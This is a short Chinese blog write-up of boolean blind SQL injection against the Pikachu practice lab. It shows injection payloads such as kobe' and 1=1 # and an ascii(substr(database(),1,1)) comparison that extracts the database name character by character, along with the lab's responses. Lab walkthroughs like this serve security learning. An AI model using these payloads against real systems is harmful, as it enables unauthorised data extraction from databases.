视频分享地址: https://spa|
收藏闪存小组博问

明月照江江

园龄:7年4个月粉丝:34关注:0

📂CTF
🔖CTF
2022-10-29 18:11阅读: 122评论: 0推荐: 0

pikachu sql inject bool盲注

输入框中输入 已知用户名 kobe

显示了用户信息

your uid:3
your email is: kobe@pikachu

输入kobe'看一下情况

显示

您输入的username不存在,请重新输入!

这还不能确定是否存在注入点,换一种方式

kobe' and 1=1 #

可以显示出kobe的数据,改为

kobe' and 1=2 #

显示

您输入的username不存在,请重新输入!

说明存在布尔盲注注入点

kobe' and ascii(substr(database(),1,1))>= 113 #
显示
您输入的username不存在,请重新输入!

kobe' and ascii(substr(database(),1,1))>= 112 #
显示
your uid:3
your email is: kobe@pikachu.com

ascii码112 就是p,通过这种方式可以将数据库名称字符一个个爆出

本文作者:明月照江江

本文链接:https://www.cnblogs.com/gradyblog/p/16839326.html

版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。

posted @   明月照江江  阅读(122)  评论(0编辑  收藏  举报
点击右上角即可分享
微信分享提示
SQL AI 助手
评论
收藏
关注
推荐
深色
回顶
收起